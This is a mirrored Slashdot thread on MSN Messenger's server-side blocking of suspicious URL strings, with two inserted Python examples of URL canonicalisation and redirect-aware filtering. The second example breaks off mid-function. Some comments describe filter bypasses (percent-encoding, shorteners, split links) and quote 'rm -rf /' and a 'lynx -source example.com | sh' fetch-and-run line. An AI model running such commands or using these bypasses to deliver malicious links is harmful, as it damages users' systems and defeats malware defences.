Slashdot Mirror


MSN Censors Your IM

Jamie ran across a story about censorship on MSN. Essentially, a number of suspicious strings result in silent failure of delivery. The strings are unsurprisingly things like .scr and .info. They've started maintaining a list if you're interested. Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.


  1. The genius that is Microsoft... by KingSkippus · · Score: 5, Informative

    From an article that is linked to from this one:

    The link filter does not take canonical URLs into account: http://evil.example.com/download.php and http://evil.example.com/down%6Coad.php are the same URL, expressed in two different ways. The first one is blocked, while the second one is not.

    Or for that matter, http://tinyurl.com/z35a5.

    Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm.

    It's also probably worth noting that the messages are blocked on the server, not the client. That means that it will block the message whether you're using the MSN client, Pidgin, or any other client to access MSN.

    My advice: Get a frickin' Google mail account already and use Google Talk instead.
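The canonicalisation point made above is the whole security lesson of this thread, so here is an added example (not code from the original page, and not Microsoft's filter) that contrasts a literal substring filter with one that canonicalises each URL before matching. The blocklist, hostnames and sample messages are constructed for illustration; the real MSN list is not reproduced.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumed blocklist for illustration only; the real MSN list is not reproduced here.
BLOCKED = (".scr", ".pif", "download.php")

# Anything that looks like scheme://... up to the next whitespace.
URL_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.\-]*://\S+")


def naive_blocked(message: str) -> bool:
    """The filter as the comment describes it: a literal substring match on the raw text."""
    text = message.lower()
    return any(token in text for token in BLOCKED)


def canonicalize_url(url: str) -> str:
    """Return a single spelling for the many spellings of the same target.

    Normalises scheme and host case, a trailing dot on the host, the default
    port, percent-encoding (decoded repeatedly so %256C does not survive) and
    '.'/'..' path segments. Query string and fragment are dropped.
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").rstrip(".")  # hostname is already lower-cased
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port: treat as unspecified
        port = None
    default_port = {"http": 80, "https": 443}.get(scheme)
    netloc = host if port in (None, default_port) else f"{host}:{port}"

    path = parts.path
    for _ in range(5):  # bounded: nested encodings are peeled, but never loop forever
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded

    segments = []
    for seg in path.split("/"):
        if seg == "..":
            if segments:
                segments.pop()
        elif seg not in ("", "."):
            segments.append(seg)
    return f"{scheme}://{netloc}/" + "/".join(segments)


def canonical_blocked(message: str) -> bool:
    """Keep the literal match, but also test every URL after canonicalising it."""
    if naive_blocked(message):
        return True
    for match in URL_RE.finditer(message):
        if any(token in canonicalize_url(match.group(0)).lower() for token in BLOCKED):
            return True
    return False


# Constructed sample messages, not real MSN traffic.
SAMPLES = {
    "plain":        "grab it: http://evil.example.com/download.php",
    "pct_encoded":  "grab it: http://evil.example.com/down%6Coad.php",
    "double_pct":   "grab it: http://evil.example.com/down%256Coad.php",
    "dot_segments": "grab it: http://EVIL.example.com.:80/x/../download.php",
    "shortener":    "grab it: http://tinyurl.example/abc123",
    "human_gap":    "grab it: http://evil.example.com/download .php (delete the space)",
}


def evaluate() -> dict:
    """Map each sample name to (naive_result, canonical_result)."""
    return {name: (naive_blocked(msg), canonical_blocked(msg)) for name, msg in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, canon) in evaluate().items():
        print(f"{name:13s} naive={naive!s:5s} canonical={canon}")
```

Canonicalising closes the percent-encoding and dot-segment variants, but the last two samples show the limit of any server-side string filter: a redirector hides the final target behind a different host, and a URL broken by a space (with "delete the space" appended) is reassembled by the human reader, not the parser. That is the argument for fixing what makes the link dangerous rather than trying to recognise it in transit.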

    1. Re:The genius that is Microsoft... by lattyware · · Score: 4, Informative

      Or just any Jabber client, for that matter.

      --
      -- Lattyware (www.lattyware.co.uk)
    2. Re:The genius that is Microsoft... by ChowRiit · · Score: 4, Insightful

      People always miss the point in these arguments, and say "get such and such instead" - it doesn't help, because my friends use MSN, and probably the same for most tech savvy MSN users. Sure, I'd rather use a better protocol, but I'm stuck using what my friends are on. This is the problem with "picking" an IM - the decision isn't made by you, but by the people you want to talk to who already have picked one.

    3. Re:The genius that is Microsoft... by rikkus-x · · Score: 2, Funny

      "Either get other friends, or convert the ones you have"

      Says the person with a binary signature.

    4. Re:The genius that is Microsoft... by Wordsmith · · Score: 4, Funny

      The day I start picking my friends based on their responses to IM security issues will be a sad, sad day.

      "Mom, I met a great girl. She's not very nice, and she's not very pretty, but she started using Jabber after the latest MSN fiasco. You'll love her. I'll have her message you; oh, but you'll have to switch off of AIM first, mom."

    5. Re:The genius that is Microsoft... by Alchemar · · Score: 2, Insightful

      I had the same problem.... I picked better friends.

      Anyone that I have any relation with knows that I will not contact them via MSN, AIM, MySpace, LiveJournal or any of their like. If they wish to communicate they can call me on the phone or send an email. If they push the point, I suggest that they learn to use IRC or obtain a HAM radio license with a Morse code rating, and I will gladly send them an instant message. Most have selected the telephone as their main choice, but one now holds a General class license. I view them pushing their "favorite" method onto me as insulting and expect them to feel the same. If they do not find a medium that is commonly available and required for business communications acceptable, then I really don't want to be associated with them.

  2. -gasp- Slashdot, too! by Aladrin · · Score: 4, Interesting

    "Nothing for you to see here. Please move along."

    I'm guessing they're using that as a way to make sure only subscribers can get first post now? It wouldn't load for me until someone had posted.

    As for the IM... I don't care what it is, it's not their job to censor it. Virus check attachments, sure... But not censor the chat. Absolutely ridiculous. Reminds me of games that try to filter out all 'bad' words and end up filtering out words like 'fanny' because they mean 'butt' in the US and apparently refer to women's genitalia in the UK. How people NAMED Fanny deal with that, I can't imagine. There were quite a few more commonplace words that mean odd things in other languages or countries and were filtered as well. Ridiculous.

    --
    "If you make people think they're thinking, they'll love you; But if you really make them think, they'll hate you." - DM
    1. Re:-gasp- Slashdot, too! by KingSkippus · · Score: 4, Funny

      Reminds me of games that try to filter out all 'bad' words

      I play City of Heroes, and for some weird reason, it blocks the word "count." I think it was a typo when someone was entering words to block into the filter. It was just kind of funny, because I discovered it when I told someone, "Don't worry, you can count on me!" and it came out as "Don't worry, you can <bleep!> on me!" They had no idea what I was talking about, and it took a few entertaining minutes to hash out what was going on.

    2. Re:-gasp- Slashdot, too! by gbjbaanb · · Score: 4, Funny

      Ah, the northern UK town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

    3. Re:-gasp- Slashdot, too! by janrinok · · Score: 2, Funny

      WHOOSH......

      --
      Have a look at soylentnews.org for a different view
    4. Re:-gasp- Slashdot, too! by Reaperducer · · Score: 3, Insightful

      The problem, though is that after the brouhaha, people started deliberately using the "innocent" word in mean-spirited ways. I mean, come on, before all of this mess, no one ever used the word niggardly in normal conversation.

      Not necessarily. It depends on who's in your circle of friends. YOUR circle of friends may not use that word, but that doesn't mean that "no one" ever used it, especially in formal writing or speeches.

      During the controversy, one of the newspapers (Boston, I think) ran through one of the loudest critics prior speeches and found that he'd used it in the past, as well.

      Just because SOME people are that special combination of both ignorant and loud, it shouldn't change the way educated people communicate.
      --
      -- I'm old enough to have lived through six different meanings of the word "hacker."
    5. Re:-gasp- Slashdot, too! by glitch23 · · Score: 5, Funny

      Ah, the northern UK town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

      No, it's "Thor". We don't like Scandinavians.

      --
      this nation, under God, shall have a new birth of freedom. -- Lincoln, Gettysburg Address
  3. Blocked firefox.exe by nurb432 · · Score: 2, Funny

    And simply renaming worked? Your IT department is pretty inept.

    --
    ---- Booth was a patriot ----
    1. Re:Blocked firefox.exe by lattyware · · Score: 5, Funny

      An inept IT department?
      OMFG!
      Someone alert the world press!

      --
      -- Lattyware (www.lattyware.co.uk)
    2. Re:Blocked firefox.exe by KingSkippus · · Score: 4, Interesting

      No, they specifically blocked firefox.exe. It wasn't part of a regular expression or policy to keep people from running their own programs. They made a deliberate and conscious choice to not only standardize on Internet Explorer as the Official Company Browser(TM), but to try to prevent anything else from even working.

      It's not the only time they've done something lame-ass like that. For example, they've also created an Active Directory policy to push down the corporate intranet page as your home page. So if you're like me and prefer something like Google as your home page, too damn bad, it resets it next time you log in. I had to go in and deny permission to that registry key for Administrators to keep that from happening. (Yes, I know, they can reset the permissions on the key if they figure out what I've done, but they're not that motivated, and the point was to keep the automatic update from happening, which this does successfully.)

    3. Re:Blocked firefox.exe by nurb432 · · Score: 2, Insightful

      Pushing down the default page via GPO sounds pretty responsible to me. It helps prevent users' default pages getting hijacked with porn sites, among other things.

      Part of IT's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then that's too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.

      --
      ---- Booth was a patriot ----
    4. Re:Blocked firefox.exe by nurb432 · · Score: 2, Insightful

      User-installed software that isn't part of the official internal standard increases support costs, among other issues. So unless there is a business need, I don't see a problem with it being blocked. (Though simply blocking an executable name isn't the right way to do it, but that is a different discussion.)

      Now, if you come up with a valid business need for said non standard software, and its ignored, then we are in agreement.

      --
      ---- Booth was a patriot ----
    5. Re:Blocked firefox.exe by KingSkippus · · Score: 4, Insightful

      If that happens to step on your personal wants, then that's too bad.

      What if it steps on what I need to do my job? I'm glad I don't work for you. You seem to be one of those types that thinks that just because something can be done, it needs to be done. Pushing down the default page doesn't protect the corporate computing assets, though I'm sure that's how our desktop goobers pitched it to management. It's just one more way to control things they have no business controlling, and it impacts our productivity.

      They also do things like push down custom Start Menu structures. Microsoft Word, for example, isn't under All Programs or even Microsoft Office like it is on every other computer. No, it's buried under "Office Applications" (not to be confused with "Business Applications," a separate directory), along with things like Adobe Acrobat and such. They've also moved Windows Explorer (the filesystem explorer, not Internet Explorer) under Accessories. If I change this to something I'm more used to, it gets reverted next time I log in. Obviously, they've also deleted and blocked Solitaire and Minesweeper from running; it wouldn't do for people to take a break from hammering their stones. The company logo is pushed out to be everyone's desktop background.

      My favorite, though, is that they've decided that everyone needs a little application called Kontiki. It's a peer-to-peer video distribution software system that turns all of our PCs into filesharing peers for corporate videos. You can't disable it and you can't delete the videos that it pushes down. (If you try to delete a video, the software automatically re-downloads it from--you guessed it--your coworkers' computers.) I detest days when corporate videos go out. My bandwidth is sucked dry by something I neither want nor use and have no control over.

      Let's see... Need more stories? How about this. They recently pushed out a piece of software called Connected Backup. What happened is that our fileservers where people's home directories were started filling up. Instead of going out and buying more hard drives or implementing quotas, they've rolled out this backup software to everyone's computer that automatically backs up your machine once a day whether you want it to or not. Now, they're telling everyone that official company policy is to NOT store important documents on the fileservers, but to store them on your local PCs. Brilliant! Of course, network traffic has shot up dramatically, and the backup servers had to have a TON of storage added to them (the data still has to go somewhere), and instead of only things that people save on the fileservers being backed up, all of their personal shit is, too.

      Every day, my computer runs a Connected backup, a virus scan, a vulnerability scan, a document retention scan, a software installation scan, Notes database replication, and my Run key in the registry has around 50 entries in it that our desktop group has loaded in, and it takes around two minutes for all of the group policies and login scripts to run when I log in. Thanks to our desktop group, literally 30 minutes of my day is wasted waiting for all of that shit to run.

      I could go on with the stupidity if you really want me to. You're right about one thing; they've definitely protected the corporate computing assets. People hate using their computers so much now that a lot of people I know have gone back to just leaving it on all the time for doing their timesheets, and conduct their normal business using such old school methods such as the telephone and pencil and paper. As for me, I actually do some of my work at home using my own computing resources, and the only reason I can tolerate using my work computer for anything is because I know how to get around most of the shit they try to push down on us.

    6. Re:Blocked firefox.exe by nurb432 · · Score: 2, Insightful

      Thats not a business case. Thats just a lame excuse.

      And in a well run shop, even if you got permission to run it, the IT department would have to install it for you. You wouldn't be downloading it yourself.

      Once you grow up and have to support 40000 users, you might understand that things are different in the business world than they are at home.

      --
      ---- Booth was a patriot ----
    7. Re:Blocked firefox.exe by Lehk228 · · Score: 2, Funny

      with two clicks you could evacuate the building? sweet next time a co-irker leaves his/her machine unlocked while they use the bathroom have a bit of fun

      --
      Snowden and Manning are heroes.
    8. Re:Blocked firefox.exe by innocent_white_lamb · · Score: 2, Insightful

      and really, the "support costs" of a freaking browser are zero anyway
       
      "Hello, helpdesk? Website X isn't working. What? It's working for you? Then there is something wrong with this computer. I want to file a help ticket now."
       
      We're probably up over twenty dollars already and haven't even sent someone out to look at this guy's computer yet.

      --
      If you're a zombie and you know it, bite your friend!
    9. Re:Blocked firefox.exe by innocent_white_lamb · · Score: 2, Insightful

      I have never, ever known someone to call helpdesk over a website not working
       
      explains
       
        Hell, for that matter I've yet to work for a company with a helpdesk.
       
      As it's impossible to call a non-existent helpdesk.
       
      So your opinion is, therefore,
       
        Bullshit
       
      as you are unqualified to express one in this situation.
       
      Sorry, no cigar this time. Nice try, though.

      --
      If you're a zombie and you know it, bite your friend!
    10. Re:Blocked firefox.exe by KingSkippus · · Score: 4, Interesting

      Odds are we know better than you...

      Maybe, but I kind of doubt it. I was an NT server support person for a couple of years, then a systems admin (and a damned good one, if I do say so myself) for almost a decade. I've fought my fair share of battles, and my background is precisely why I know how to get around most of the shit they keep trying to push down to my workstation.

      Some higher up executive, though, decided to bring it up... (blah blah blah)

      Did you try to fight it? Did you tell your manager, "This is a bad idea, and here's why..."? Like I've said, I've fought my fair share of battles. I haven't won them all. I had to delete Solitaire and Minesweeper at a smaller company I worked at because, as my boss said, "I hate those stupid timewasters." However, when he had a meeting to tell us that he read that you could lock down the desktop background image, I explained to him why that was a bad idea, and actually won that battle.

      At my last job before the one I have now, I was the manager of server operations. I hate to say it, but my boss was a complete idiot who didn't know a thing about managing an IT department. It was ridiculous, and on more than one occasion, I found myself in the CFO's office (his boss) explaining why what my boss had told him was a load of hooey. I ended up quitting because I literally was afraid that I would be prosecuted at some point for something my boss would make me do and pinned on me as a scapegoat, and a few months later, he was finally fired because he screwed up a license scheme and it cost the company over $100 thousand (a LOT of money for that company). While I was there, I actually deliberately disobeyed him on many occasions when he asked me to do things that were illegal and/or unethical.

      But the desktop goobers where I am now? They don't just implement management's decisions. Believe me, I've talked to them on many occasions, and they actually defend what they've done. I know for a fact that they are the ones who are instigating a lot of this crap, because in my company, it's how you get ahead; you lead a project that costs hundreds of thousands of dollars and put together reports about how well it went. What? There isn't a project involving spending hundreds of thousands of dollars? Then you make one up.

      So yeah, I guess I am one of those users. As a matter of fact, I do know more than most of our IT folks about how these systems work. And if they stand in the way of me doing my job, I'll go around them without an iota of guilt because frankly, what I'm doing is much more important than them locking down my home page and desktop background.

    11. Re:Blocked firefox.exe by rohrb123 · · Score: 2, Insightful

      I understand where you're coming from and won't attempt to defend your IT department's actions - completely. Poorly designed network, server, and backup schemes like that are inexcusable. It's quite obvious they're making problems worse instead of fixing them, and creating new ones. It's very simple to have computers turn on with WOL, run a virus scan at night, and turn back off with remote shutdown, and totally unnecessary for any background scans to be running during the day. And lack of storage space is probably the lamest excuse any IT department can come up with these days, with 1TB SATA drives under $400. We maintain 225GB of shared storage PER USER, and the costs were rather small, even for fibre channel.

      However, I've found IT is sometimes used to take care of problems that are really the domain of management or HR, and in this case you generally have to focus on the lowest common denominator. Say you have an employee who's really, really good at what he does, and has gone above and beyond tasked duties a number of times for the company. His skill set alone makes him difficult to replace, especially at what he's currently being paid. However, he has the bad habit of coming in at 6AM and downloading porn on company computers, because he has a wife and kids at home. How did we find out? the startup page being changed to a porn site, as well as several minor adware installations. "Um I don't know how this happened!!" This was when we instituted several new technology policies, including a content-filter as well as a GPO-set home page. Fortunately our startup page only contains links to the most-used work related sites, and google. But it still pissed off people who wanted to catch the news headlines every time they opened their browser.

      I've had similar issues with webmail, screensavers, backgrounds, partypoker, ebay, solitaire and similar programs, the list goes on. It's sad that many people can't get it through their heads that when they're at work they're being paid to work, not work when it's convenient for them. It's also sad that these problems have to be solved via technology instead of management addressing them directly. I've found that to be the origin of many IT "control" policies in my brief experience, and they only tend to make problems worse. You have a secretary in a cubicle who spends half an hour a day (paid) on myspace, and instead of her receiving some sort of formal reprimand, you're instructed to block myspace at the proxy server. She then wastes an hour per day - half of it trying to get around the filter with various proxies, the other half taking care of her social business. Management's response? "well, we'll lose more productivity firing her and training someone else than keeping her on", like there's no middle ground.

      To me it seems like your company is making a piss-poor attempt at increasing productivity by decreasing the opportunities for distraction. They're probably the type who think their way of doing things is the most efficient and forcing that upon everyone else is a good thing (such as those custom folders brought up). I've been on the other side of that coin when an employee was having issues with Yahoo directions, when we had a copy of MapPoint 2k7 as well as Google Earth on their computer. It's tricky business, and sometimes it's difficult to foresee when you might step on a user's toes, especially the rare advanced user.

      As for the rest of the stuff your IT department does, such as video sharing, well, erm, see article on using linux at work?

  4. I already knew some by alx5000 · · Score: 4, Interesting

    Since the day I went almost crazy trying to pass a URL which included 'download.php?' from a well-trusted website to a friend. All of my messages were sent back to me. PITA.

    Fortunately, it's kinda easily fooled if you randomly place a space and add "delete the space" at the end of the sentence. If they trust me in the first place, what prevents them from copy-pasting it and deleting a character as I requested?

    --
    My 0.02 cents
  5. Misleading headline by noidentity · · Score: 3, Insightful

    This isn't censorship; it's just a poor firewall. The difference is that the former is for stifling human communication, while the latter is to protect machines from malicious software.

    1. Re:Misleading headline by jamie · · Score: 3, Informative

      No, the data which is being blocked from transmission is not blocked because it's going to a computer program which would be exploited by it. At least I haven't seen any allegations of that. It's being blocked because the human that would receive the data might use it in a way deemed inappropriate (by clicking on it, say).

    2. Re:Misleading headline by jez9999 · · Score: 4, Informative

      Are you the guy that Slashdot hired to start correcting all the inaccurate stories and comments posted here?

  6. Priorities and mitigation by Fastolfe · · Score: 3, Insightful

    Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

    Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM? Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects? If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time? There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.

    This also assumes that the same organization even owns the bug in question. Not all of these defects may be Microsoft's problem to begin with. This might even be a MORE reasonable action for them to take, since they're doing "everything in their power" to fight the problem rather than just sitting on their hands waiting for a 3rd-party to correct their bug, and sitting on their hands longer waiting for the end user to update their software.

    1. Re:Priorities and mitigation by RAMMS+EIN · · Score: 2, Interesting

      ``Do you really think they're diverting resources away from fixing bugs so that they can add "censorship" features to IM?''

      Yes.

      ``Perhaps this is just one effort among multiple efforts to correct problems AND mitigate their effects?''

      That sounds almost reasonable. Except that it implies that Microsoft actually makes a serious effort to fix the security holes they've saddled their users with. I had some hopes that, with Vista, they had actually started down that road, but these hopes have since been thoroughly dashed. Microsoft aren't and have never been serious about the security of their users.

      This is not part among "multiple efforts to correct problems AND mitigate their effects", this is a lame cop-out.

      ``If it's going to take X weeks to fix the bug, but Y days to implement a filter that will stop some large percentage of infections, don't you think that both avenues are worth exploration at the same time?''

      Yes, but that's not what's happening. What's happening is that Microsoft is censoring their IM service. I believe this is in a sincere effort to slow the spreading of malware over MSN, but that doesn't mean it's a Good Thing. For one thing, it also degrades the usability of the service for legitimate purposes. For another, it doesn't _actually_ stop the malware. What it does is erect some barrier. In that sense, it's not very different from the bazillions of "Are you sure?" dialogs that Microsoft software is full of. Except that these dialogs _could_ actually help educate users, if said users would bother to read and learn. Blocking certain messages just annoys legitimate users of the service. The filter will be bypassed. After that, everything is as it was, except less usable. And in the meantime, Microsoft introduces new security holes and lets other holes linger.

      Oh, and did you realize that this censoring (which really has been going on for months if not years now) can also be used as a stepping stone to censoring things that Microsoft considers harmful, even if the users would likely find them bona-fide? I've already had several of my messages blocked by the filters, and I assure you they did not in any way relate to malware. Perhaps a few cases of open-source software, though.

      ``There's more to slowing and preventing the spread of malware than fixing the defect that allows them to propagate.''

      Sure. And I do believe this is a sincere effort to protect MSN users. I just think the cure is worse than the disease.

      --
      Please correct me if I got my facts wrong.
  7. .INFO by tverbeek · · Score: 3, Insightful

    I don't suppose it's occurred to Microsoft that .info is a perfectly valid TLD used by a significant number of legitimate web sites, and a perfectly appropriate string to include in an IM discussion.

    --
    http://alternatives.rzero.com/
  8. .com by Anonymous Coward · · Score: 2, Funny

    Do they block those scary executable .com files too?

  9. MSN does some weiiiiiird things... by jez9999 · · Score: 5, Interesting

    Here's one it started doing since the recent MS security drive. Any file that could possibly exploit a hole in any piece of software seems to be treated with serious suspicion. Somehow, this seems to include GIF files. So, when someone tried to send me a GIF file, I get this warning. I download it anyway, and it's sitting on my hard drive. I can copy it somewhere else, open it, etc.

    However - and this is the kicker - when I click on the blue link to the file in the MSN chat window, I get this dialog. Yeah, it actually DELETED the file I just downloaded. After I copied it using Explorer. And I have full access to it. Dunno who implemented that piece of genius.

    1. Re:MSN does some weiiiiiird things... by tepples · · Score: 2, Funny

      That Microsoft crackden 'feature' is one big pain in the ass! Damn. The hassle I've had with that fucking policy. How do you turn it off? One way is to install Ubuntu, but it's not for everyone.
    2. Re:MSN does some weiiiiiird things... by gardyloo · · Score: 2, Insightful

      Yep, that's astoundingly annoying. IIRC, you can do a "Save To..." instead of allowing MSN to choose where to save it. Then it doesn't get deleted.

  10. And if they didnt by nurb432 · · Score: 2, Insightful

    The first person that got infected with something would bitch that Microsoft didn't do enough.

    Not that I'm fond of them either, but it seems they can't win either way these days.

    --
    ---- Booth was a patriot ----
  11. At least they're doing something by Deathlizard · · Score: 4, Informative

    Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place

    At least they're trying something (albeit a weak approach) to stop automated scripts from sending viruses all over their chat protocol.

    When you work on 1000+ college student laptops, you learn a lot of things about software students use in general, and one of these things you learn is:

    1) AIM is a Virus downloading service disguised as a chat protocol.

    I know that AOL doesn't do this on purpose, but it is so easy to hack that it might as well be. It's great when a 12 year old downloads a virus that infects AIM thinking it was some game (probably from AIM, I might add), it sends "Hey check this out!" to his sister at the college containing an infected link or program, and the next thing you know you're running Aimfix and cleaning Zlob off 300 PCs.

    If AIM would simply filter out the bad traffic (and they should be able to know if a client is spamming the servers like crazy by heuristics alone) it would stop a lot of scams dead in their tracks.

  12. Old news! by Stormx2 · · Score: 3, Informative

    This has been known about for years. Here's a digg posting from over a year ago...

  13. All the more reason to use Jabber/XMPP by MysticOne · · Score: 2, Informative

    You can set up your own server, you can control your own IM stuffs, and really ... it's just a better solution. You could still go with GTalk if you want access to the Jabber network without setting up a server or doing anything fancy, but in that case I'd recommend encryption for your conversations (you should probably do that anyway). If you just want to set up a new Jabber account on one of the public servers, head on over to jabber.org and pick one out.

  14. Four ways to hide the .php extension by tepples · · Score: 5, Informative

    And what does every Linux web server come with?

    Perl.

    Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation:

    • With Options MultiViews, the client requests /download?foo=bar. Apache HTTP Server will look for a file called download, not find it, and then search for download.* and run the first thing it finds.
    • Type-mapped negotiation in Apache works much the same way, except it uses .var files (similar to Windows shortcuts) that point to your script. For instance, /download?foo=bar would reference /download.var, which points to /download.php. It's useful if you have a lot of small requests, for which the repeated directory scans performed by MultiViews might become CPU-bound.
    • Rename download.php to download/index.php, and Apache will find it when it scans index.* to display a default page for a directory.
    • Last but not least, mod_rewrite.
    1. Re:Four ways to hide the .php extension by Zonk+(troll) · · Score: 5, Informative

      Or, do it the way I do.

      1. Name the PHP file "download".
      2. Use this option either in httpd.conf or .htaccess:

      <Files /path/to/file/download>
      SetHandler application/x-httpd-php
      </Files>

      3. Access it like:
      http://localhost/download or accept arguments like http://localhost/download/file.odt

      If you want to get what comes after the slash, this is all you need:

      $thePath = explode("/", str_replace($_SERVER['SCRIPT_NAME'], "", $_SERVER['REQUEST_URI'])); // strip the script's own name (e.g. "/download") from the request URI, then split the remainder on "/"

      file.odt would be located in $thePath[1].

      --
      "The Federal Reserve is a fraudulent system."--Lew Rockwell
      End The FED. -
    2. Re:Four ways to hide the .php extension by Zonk+(troll) · · Score: 4, Informative

      $thePath = explode("/",ereg_replace($_SERVER['SCRIPT_NAME']," ",$_SERVER['REQUEST_URI'])); There isn't supposed to be a space in the quotes. The lameness filter added that.

      --
      "The Federal Reserve is a fraudulent system."--Lew Rockwell
      End The FED. -
    3. Re:Four ways to hide the .php extension by Dragonslicer · · Score: 2, Interesting

      Still, the administrator of a server running PHP 5 can get scripts to run without having .php in the URL by using various forms of content negotiation:

      Another option is to use the AddType directive to have other file extensions run through the PHP interpreter. If you don't have any static pages on your site or can accept the minor performance hit, you can send all .html files through PHP.
  15. Oh please. by arcade · · Score: 2

    Anyone who knows me knows that I haven't used windows since 1999. I simply can't stand the system, nor can I stand the corporation behind it.

    However. I'm also interested in computer security.

    It _MAKES SENSE_ to block stuff that has been observed in automated worms. It's a simple solution. It's not something that will make all systems invulnerable - but it _MAKES SENSE_. It's a quickfix. A quickfix that works.

    This is only "censorship" insofar that it actually prevents stupid automated worms to spread. It's a defensive measure. Not a perfect one, but one.

    Oh, and patching the holes. Sure. You can patch the holes. Then everyone has to update .. should we try to protect, or should we ignore those that do not upgrade their systems? The cynic in me tells me : "Let them be cracked". The humanitarian in me tells me: "Well, think of the victims of the DDOS attacks from the botnets of previously-vulnerable people".

    I'm dead tired of _idiots_ who think that any preventative measure is evil! censorship! bad!

    Microsoft is simply trying to help in this case. If you do not like it, use another IM service. Like Yahoo! .. or IRC for that matter. Heck. PLEASE go back to IRC. It's still the best means of communication there is.

    So, please you censorship-screaming morons:

    SHUT UP! STOP USING THEIR SERVICE IF YOU DO NOT LIKE IT. THEY ARE TRYING TO DO THE RIGHT THING IN THIS INSTANCE !

    *phew*. Now I have to go wash my brain. I've just defended satan.

    --
    "Rune Kristian Viken" - http://www.nwo.no - arca
    1. Re:Oh please. by Tama00 · · Score: 2, Insightful

      I don't know why this is flagged as flamebait, this guy is correct.

      Microsoft censored the words to stop those stupid worms going over everyone's MSN account, you know those stupid viruses that say, "i found a pic of you at www.somewhere.com/download.php?name=virus" and then some silly teenage girl would go, OMG REALLY and click on it, now she has the virus and it's telling all her contacts the name thing.

      So how do they put a stop to this? Just censor the bloody URL so the message won't send.

      Some of you guys on Slashdot just have got to realise that MOST PEOPLE WHO USE COMPUTERS ARE _NOT_ AS SMART AS YOU! Some won't update their programs, others won't know how to remove the virus and even more will click on stupid links like that.

  16. Fix what? by defile · · Score: 4, Insightful

    Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

    Someone want to tell me how you fix a user who downloads and runs untrusted executable code?

    I've seen plenty of Linux n00bs get tricked into running rm -rf /. Or lynx -source example.com | sh

    MSN implementing filters on certain strings is just a small measure in a huge arms race any major IM system has to deal with.

    PS. You can save yourself the trouble of replying if you're going to tell me Linux only allows the user to destroy all of his files and not the entire OS.

  17. Vulnerabilities by TopSpin · · Score: 2, Insightful

    I'd rather they fix the vulnerabilities

    How would you detect the idiocy level of the recipient? If you spam a thousand accounts with "OMG check this http://somedomain/hot-teen-s3x.scr" you just know some fraction of the audience will dutifully follow the link and then dismiss every prompt that appears trying to prevent installation.

    Worse, after they get their own machine hacked, they'll blame MSN. They'll contact whatever 'customer service' facility is provided and scream bloody murder. If they manage to get fired as a result they may even sue. Don't doubt that there are employers capable of getting litigious with MSN over it, also.

    Sadly, this is the reality of operating an IM/Email/SMS service today. Look carefully at that graphic and realize that it is not an exaggeration.

    --
    Lurking at the bottom of the gravity well, getting old
  18. The Solution! by causality · · Score: 4, Insightful

    The solution?

    Apply some idea of "common carrier" status to MSN. Like the telephone companies, as long as they do not attempt to edit or censor the content that passes through their networks, in any way, then they are not responsible and cannot be held liable for any damage caused by such content. But the moment they start taking measures like this to try to "sanitize" the content of the network, make them legally liable to pay damages for any successful attack/exploit that they are unable to prevent.

    Overnight, this stupidity would go away. It would also set a great precedent for any other companies that wish to do this.

    --
    It is a miracle that curiosity survives formal education. - Einstein
  19. Re:Anybody else notice its .php files that get ... by Lillesvin · · Score: 3, Insightful

    Also the php files are in the document_root directory (or whatever you want to call it).

    Yeah, on the server - then they could exploit the server hosting them... Why on earth would MS care about that? They're doing the filtering to protect the end-users from exploits of vulnerabilities in the MSN client. It doesn't matter the least bit if it's PHP, Perl, Ruby, ASP or whatever that runs on the server-side - it's what is returned from the server-side that matters. I'll have to agree with the guy guessing that PHP is usually the first choice of scripting language for script kiddies.

    And as the first poster noted, TinyURLs get through just fine, plus it'd be the least of problems to make an HTTP redirect, so http://example.com/harmless.script points to http://example.com/malicious.script?that=pwns&MSN=users. This way of "fixing" bugs is nothing but retarded - it fixes nothing and it hassles end-users a great deal - some of those substrings that are getting blocked are VERY common.

    --
    "Live free or don't."
  20. Full list by marcansoft · · Score: 2, Interesting

    kakaroto from the amsn project somehow obtained the full censored regexp list. There are about 90 in total.

    http://www.amsn-project.net/forums/viewtopic.php?t=157&postdays=0&postorder=asc&start=30
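    Lillesvin's point above (shorteners and HTTP redirects sail through a substring filter while everyday strings like ".script" trip it) and the regexp list mentioned in this post come down to the same thing: matching raw strings in the message text is the wrong layer to filter at. Below is an added Python example, not code from the page, from MSN or from the aMSN project, that contrasts a constructed substring filter with one that decides on the file extension of the canonicalized final destination. The block list, the REDIRECTS table (standing in for a shortener or 3xx hop that a real service would have to follow over the network), the hostnames and the sample messages are all constructed; percent-decoding the path generalizes beyond the comment's own examples.

```python
import re
from urllib.parse import urlsplit, urlunsplit, unquote

# Constructed block list in the spirit of the thread: strings the filter is
# said to match as raw substrings of the message text.
BLOCKED_EXTENSIONS = (".scr", ".php")

# Constructed redirect table: stands in for a URL shortener or an HTTP 3xx
# answer. A real filter would have to fetch each link to learn this.
REDIRECTS = {
    "http://short.example/x1": "http://example.com/payload.php",
    "http://example.com/harmless.script": "http://example.com/malicious.php",
}

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def naive_filter(message: str) -> bool:
    """The substring approach criticised in the thread: block the message if
    any listed string occurs anywhere in the raw text."""
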